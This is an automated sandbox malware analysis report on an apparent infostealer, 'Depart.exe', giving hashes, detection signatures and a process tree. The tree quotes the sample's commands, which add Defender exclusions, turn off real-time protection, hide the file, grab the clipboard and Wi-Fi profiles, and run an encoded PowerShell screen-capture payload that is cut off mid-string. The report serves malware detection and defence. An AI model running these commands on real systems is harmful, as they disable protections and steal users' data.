Resubmissions
17-11-2024 07:16
241117-h38bsavakd 10Analysis
-
max time kernel
94s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
17-11-2024 07:16
Behavioral task
behavioral1
Sample
Depart.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Depart.exe
Resource
win10v2004-20241007-en
General
-
Target
Depart.exe
-
Size
7.4MB
-
MD5
600ff2b2bc06dc4349d23066f49fb171
-
SHA1
229f87b2653ec2362fc227ad770a1a2718134f2d
-
SHA256
a04e02f81cb59df2544fcb69df9489cd78444f05eda3db63260a2c62134718fd
-
SHA512
1bbfcf2c3e4f66046db1f2deec32371e9072a9d732e590dcd812bb6eec53c335af483f4b741a87eba214175df29c88dea0cf62f43e495493ff2de5ab8eac3664
-
SSDEEP
98304:ElSi8TRtlurErvz81LpWjjUa50ZtPvYRt2e4GFNGjfzfbIbApJo4EwKhOh112mJR:EUNlurErvI9pWjgfPvzm6gsFEF4fZ
Malware Config
Signatures
-
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 4368 powershell.exe 3380 powershell.exe 3268 powershell.exe 1168 powershell.exe 388 powershell.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
-
Executes dropped EXE 1 IoCs
Processes:
rar.exepid Process 1168 rar.exe -
Loads dropped DLL 17 IoCs
Processes:
Depart.exepid Process 3432 Depart.exe 3432 Depart.exe 3432 Depart.exe 3432 Depart.exe 3432 Depart.exe 3432 Depart.exe 3432 Depart.exe 3432 Depart.exe 3432 Depart.exe 3432 Depart.exe 3432 Depart.exe 3432 Depart.exe 3432 Depart.exe 3432 Depart.exe 3432 Depart.exe 3432 Depart.exe 3432 Depart.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 7 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exepid Process 2264 tasklist.exe 4916 tasklist.exe 2032 tasklist.exe 2708 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
-
Processes:
resource yara_rule behavioral2/files/0x000a000000023b84-21.dat upx behavioral2/memory/3432-25-0x00007FFB81410000-0x00007FFB81A02000-memory.dmp upx behavioral2/files/0x0031000000023b77-27.dat upx behavioral2/memory/3432-30-0x00007FFB95A20000-0x00007FFB95A44000-memory.dmp upx behavioral2/files/0x000a000000023b82-29.dat upx behavioral2/files/0x000a000000023b7e-47.dat upx behavioral2/memory/3432-48-0x00007FFB99D20000-0x00007FFB99D2F000-memory.dmp upx behavioral2/files/0x000a000000023b7d-46.dat upx behavioral2/files/0x000a000000023b7c-45.dat upx behavioral2/files/0x000a000000023b7b-44.dat upx behavioral2/files/0x000a000000023b7a-43.dat upx behavioral2/files/0x000a000000023b79-42.dat upx behavioral2/files/0x000a000000023b78-41.dat upx behavioral2/files/0x0031000000023b76-40.dat upx behavioral2/files/0x000a000000023b89-39.dat upx behavioral2/files/0x000a000000023b88-38.dat upx behavioral2/files/0x000a000000023b87-37.dat upx behavioral2/files/0x000a000000023b83-34.dat upx behavioral2/files/0x000a000000023b81-33.dat upx behavioral2/memory/3432-54-0x00007FFB95950000-0x00007FFB9597D000-memory.dmp upx behavioral2/memory/3432-56-0x00007FFB96960000-0x00007FFB96979000-memory.dmp upx behavioral2/memory/3432-58-0x00007FFB91350000-0x00007FFB91373000-memory.dmp upx behavioral2/memory/3432-60-0x00007FFB8D120000-0x00007FFB8D29E000-memory.dmp upx behavioral2/memory/3432-62-0x00007FFB91080000-0x00007FFB91099000-memory.dmp upx behavioral2/memory/3432-64-0x00007FFB98370000-0x00007FFB9837D000-memory.dmp upx behavioral2/memory/3432-66-0x00007FFB90EF0000-0x00007FFB90F23000-memory.dmp upx behavioral2/memory/3432-70-0x00007FFB81410000-0x00007FFB81A02000-memory.dmp upx behavioral2/memory/3432-74-0x00007FFB95A20000-0x00007FFB95A44000-memory.dmp upx behavioral2/memory/3432-73-0x00007FFB80830000-0x00007FFB80D59000-memory.dmp upx behavioral2/memory/3432-71-0x00007FFB80D60000-0x00007FFB80E2D000-memory.dmp upx behavioral2/memory/3432-80-0x00007FFB80710000-0x00007FFB8082C000-memory.dmp upx behavioral2/memory/3432-79-0x00007FFB96A30000-0x00007FFB96A3D000-memory.dmp upx behavioral2/memory/3432-76-0x00007FFB90460000-0x00007FFB90474000-memory.dmp upx behavioral2/memory/3432-82-0x00007FFB8D120000-0x00007FFB8D29E000-memory.dmp upx behavioral2/memory/3432-81-0x00007FFB91350000-0x00007FFB91373000-memory.dmp upx behavioral2/memory/3432-111-0x00007FFB91080000-0x00007FFB91099000-memory.dmp upx behavioral2/memory/3432-212-0x00007FFB90EF0000-0x00007FFB90F23000-memory.dmp upx behavioral2/memory/3432-239-0x00007FFB80D60000-0x00007FFB80E2D000-memory.dmp upx behavioral2/memory/3432-304-0x00007FFB80830000-0x00007FFB80D59000-memory.dmp upx behavioral2/memory/3432-324-0x00007FFB95A20000-0x00007FFB95A44000-memory.dmp upx behavioral2/memory/3432-323-0x00007FFB81410000-0x00007FFB81A02000-memory.dmp upx behavioral2/memory/3432-329-0x00007FFB8D120000-0x00007FFB8D29E000-memory.dmp upx behavioral2/memory/3432-371-0x00007FFB96A30000-0x00007FFB96A3D000-memory.dmp upx behavioral2/memory/3432-370-0x00007FFB90460000-0x00007FFB90474000-memory.dmp upx behavioral2/memory/3432-360-0x00007FFB99D20000-0x00007FFB99D2F000-memory.dmp upx behavioral2/memory/3432-364-0x00007FFB8D120000-0x00007FFB8D29E000-memory.dmp upx behavioral2/memory/3432-359-0x00007FFB95A20000-0x00007FFB95A44000-memory.dmp upx behavioral2/memory/3432-358-0x00007FFB81410000-0x00007FFB81A02000-memory.dmp upx behavioral2/memory/3432-381-0x00007FFB80D60000-0x00007FFB80E2D000-memory.dmp upx behavioral2/memory/3432-380-0x00007FFB90EF0000-0x00007FFB90F23000-memory.dmp upx behavioral2/memory/3432-379-0x00007FFB98370000-0x00007FFB9837D000-memory.dmp upx behavioral2/memory/3432-378-0x00007FFB91080000-0x00007FFB91099000-memory.dmp upx behavioral2/memory/3432-377-0x00007FFB80710000-0x00007FFB8082C000-memory.dmp upx behavioral2/memory/3432-376-0x00007FFB91350000-0x00007FFB91373000-memory.dmp upx behavioral2/memory/3432-375-0x00007FFB96960000-0x00007FFB96979000-memory.dmp upx behavioral2/memory/3432-374-0x00007FFB95950000-0x00007FFB9597D000-memory.dmp upx behavioral2/memory/3432-373-0x00007FFB80830000-0x00007FFB80D59000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid Process 752 cmd.exe 1088 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
Processes:
WMIC.exeWMIC.exeWMIC.exepid Process 2952 WMIC.exe 2244 WMIC.exe 2228 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 3380 powershell.exe 3380 powershell.exe 388 powershell.exe 388 powershell.exe 388 powershell.exe 1168 powershell.exe 1168 powershell.exe 1168 powershell.exe 2228 powershell.exe 2228 powershell.exe 5084 powershell.exe 5084 powershell.exe 2228 powershell.exe 5084 powershell.exe 3268 powershell.exe 3268 powershell.exe 2132 powershell.exe 2132 powershell.exe 4368 powershell.exe 4368 powershell.exe 828 powershell.exe 828 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exeWMIC.exetasklist.exepowershell.exeWMIC.exedescription pid Process Token: SeDebugPrivilege 3380 powershell.exe Token: SeIncreaseQuotaPrivilege 1060 WMIC.exe Token: SeSecurityPrivilege 1060 WMIC.exe Token: SeTakeOwnershipPrivilege 1060 WMIC.exe Token: SeLoadDriverPrivilege 1060 WMIC.exe Token: SeSystemProfilePrivilege 1060 WMIC.exe Token: SeSystemtimePrivilege 1060 WMIC.exe Token: SeProfSingleProcessPrivilege 1060 WMIC.exe Token: SeIncBasePriorityPrivilege 1060 WMIC.exe Token: SeCreatePagefilePrivilege 1060 WMIC.exe Token: SeBackupPrivilege 1060 WMIC.exe Token: SeRestorePrivilege 1060 WMIC.exe Token: SeShutdownPrivilege 1060 WMIC.exe Token: SeDebugPrivilege 1060 WMIC.exe Token: SeSystemEnvironmentPrivilege 1060 WMIC.exe Token: SeRemoteShutdownPrivilege 1060 WMIC.exe Token: SeUndockPrivilege 1060 WMIC.exe Token: SeManageVolumePrivilege 1060 WMIC.exe Token: 33 1060 WMIC.exe Token: 34 1060 WMIC.exe Token: 35 1060 WMIC.exe Token: 36 1060 WMIC.exe Token: SeDebugPrivilege 2264 tasklist.exe Token: SeDebugPrivilege 388 powershell.exe Token: SeIncreaseQuotaPrivilege 1060 WMIC.exe Token: SeSecurityPrivilege 1060 WMIC.exe Token: SeTakeOwnershipPrivilege 1060 WMIC.exe Token: SeLoadDriverPrivilege 1060 WMIC.exe Token: SeSystemProfilePrivilege 1060 WMIC.exe Token: SeSystemtimePrivilege 1060 WMIC.exe Token: SeProfSingleProcessPrivilege 1060 WMIC.exe Token: SeIncBasePriorityPrivilege 1060 WMIC.exe Token: SeCreatePagefilePrivilege 1060 WMIC.exe Token: SeBackupPrivilege 1060 WMIC.exe Token: SeRestorePrivilege 1060 WMIC.exe Token: SeShutdownPrivilege 1060 WMIC.exe Token: SeDebugPrivilege 1060 WMIC.exe Token: SeSystemEnvironmentPrivilege 1060 WMIC.exe Token: SeRemoteShutdownPrivilege 1060 WMIC.exe Token: SeUndockPrivilege 1060 WMIC.exe Token: SeManageVolumePrivilege 1060 WMIC.exe Token: 33 1060 WMIC.exe Token: 34 1060 WMIC.exe Token: 35 1060 WMIC.exe Token: 36 1060 WMIC.exe Token: SeIncreaseQuotaPrivilege 2952 WMIC.exe Token: SeSecurityPrivilege 2952 WMIC.exe Token: SeTakeOwnershipPrivilege 2952 WMIC.exe Token: SeLoadDriverPrivilege 2952 WMIC.exe Token: SeSystemProfilePrivilege 2952 WMIC.exe Token: SeSystemtimePrivilege 2952 WMIC.exe Token: SeProfSingleProcessPrivilege 2952 WMIC.exe Token: SeIncBasePriorityPrivilege 2952 WMIC.exe Token: SeCreatePagefilePrivilege 2952 WMIC.exe Token: SeBackupPrivilege 2952 WMIC.exe Token: SeRestorePrivilege 2952 WMIC.exe Token: SeShutdownPrivilege 2952 WMIC.exe Token: SeDebugPrivilege 2952 WMIC.exe Token: SeSystemEnvironmentPrivilege 2952 WMIC.exe Token: SeRemoteShutdownPrivilege 2952 WMIC.exe Token: SeUndockPrivilege 2952 WMIC.exe Token: SeManageVolumePrivilege 2952 WMIC.exe Token: 33 2952 WMIC.exe Token: 34 2952 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Depart.exeDepart.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid Process procid_target PID 2320 wrote to memory of 3432 2320 Depart.exe 83 PID 2320 wrote to memory of 3432 2320 Depart.exe 83 PID 3432 wrote to memory of 2788 3432 Depart.exe 86 PID 3432 wrote to memory of 2788 3432 Depart.exe 86 PID 3432 wrote to memory of 3636 3432 Depart.exe 87 PID 3432 wrote to memory of 3636 3432 Depart.exe 87 PID 3432 wrote to memory of 1540 3432 Depart.exe 89 PID 3432 wrote to memory of 1540 3432 Depart.exe 89 PID 3432 wrote to memory of 4072 3432 Depart.exe 92 PID 3432 wrote to memory of 4072 3432 Depart.exe 92 PID 3636 wrote to memory of 3380 3636 cmd.exe 94 PID 3636 wrote to memory of 3380 3636 cmd.exe 94 PID 2788 wrote to memory of 388 2788 cmd.exe 95 PID 2788 wrote to memory of 388 2788 cmd.exe 95 PID 1540 wrote to memory of 2264 1540 cmd.exe 96 PID 1540 wrote to memory of 2264 1540 cmd.exe 96 PID 4072 wrote to memory of 1060 4072 cmd.exe 97 PID 4072 wrote to memory of 1060 4072 cmd.exe 97 PID 3432 wrote to memory of 4384 3432 Depart.exe 153 PID 3432 wrote to memory of 4384 3432 Depart.exe 153 PID 4384 wrote to memory of 4144 4384 cmd.exe 101 PID 4384 wrote to memory of 4144 4384 cmd.exe 101 PID 3432 wrote to memory of 4664 3432 Depart.exe 102 PID 3432 wrote to memory of 4664 3432 Depart.exe 102 PID 4664 wrote to memory of 4856 4664 cmd.exe 104 PID 4664 wrote to memory of 4856 4664 cmd.exe 104 PID 3432 wrote to memory of 4344 3432 Depart.exe 144 PID 3432 wrote to memory of 4344 3432 Depart.exe 144 PID 4344 wrote to memory of 2952 4344 cmd.exe 108 PID 4344 wrote to memory of 2952 4344 cmd.exe 108 PID 3432 wrote to memory of 516 3432 Depart.exe 109 PID 3432 wrote to memory of 516 3432 Depart.exe 109 PID 516 wrote to memory of 2244 516 cmd.exe 111 PID 516 wrote to memory of 2244 516 cmd.exe 111 PID 3432 wrote to memory of 3480 3432 Depart.exe 112 PID 3432 wrote to memory of 3480 3432 Depart.exe 112 PID 3432 wrote to memory of 3732 3432 Depart.exe 113 PID 3432 wrote to memory of 3732 3432 Depart.exe 113 PID 3732 wrote to memory of 1168 3732 cmd.exe 176 PID 3732 wrote to memory of 1168 3732 cmd.exe 176 PID 3480 wrote to memory of 3728 3480 cmd.exe 116 PID 3480 wrote to memory of 3728 3480 cmd.exe 116 PID 3432 wrote to memory of 4100 3432 Depart.exe 118 PID 3432 wrote to memory of 4100 3432 Depart.exe 118 PID 3432 wrote to memory of 2760 3432 Depart.exe 119 PID 3432 wrote to memory of 2760 3432 Depart.exe 119 PID 4100 wrote to memory of 4916 4100 cmd.exe 122 PID 4100 wrote to memory of 4916 4100 cmd.exe 122 PID 3432 wrote to memory of 620 3432 Depart.exe 123 PID 3432 wrote to memory of 620 3432 Depart.exe 123 PID 3432 wrote to memory of 5116 3432 Depart.exe 124 PID 3432 wrote to memory of 5116 3432 Depart.exe 124 PID 2760 wrote to memory of 2032 2760 cmd.exe 127 PID 2760 wrote to memory of 2032 2760 cmd.exe 127 PID 3432 wrote to memory of 3460 3432 Depart.exe 128 PID 3432 wrote to memory of 3460 3432 Depart.exe 128 PID 3432 wrote to memory of 2312 3432 Depart.exe 129 PID 3432 wrote to memory of 2312 3432 Depart.exe 129 PID 3432 wrote to memory of 4324 3432 Depart.exe 132 PID 3432 wrote to memory of 4324 3432 Depart.exe 132 PID 3432 wrote to memory of 3828 3432 Depart.exe 133 PID 3432 wrote to memory of 3828 3432 Depart.exe 133 PID 3432 wrote to memory of 2692 3432 Depart.exe 136 PID 3432 wrote to memory of 2692 3432 Depart.exe 136 -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Depart.exe"C:\Users\Admin\AppData\Local\Temp\Depart.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Users\Admin\AppData\Local\Temp\Depart.exe"C:\Users\Admin\AppData\Local\Temp\Depart.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3432 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Depart.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Depart.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:388
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:3636 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3380
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1540 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2264
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:4072 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1060
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:4144
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:4664 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:4856
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:4344 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:2952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:516 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:2244
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Depart.exe""3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:3480 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\Depart.exe"4⤵
- Views/modifies file attributes
PID:3728
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:3732 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1168
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4100 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4916
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:620
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:1516
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:5116 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:2228
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:3460
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:2312
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4324 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4876
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:3828
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:4344
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQB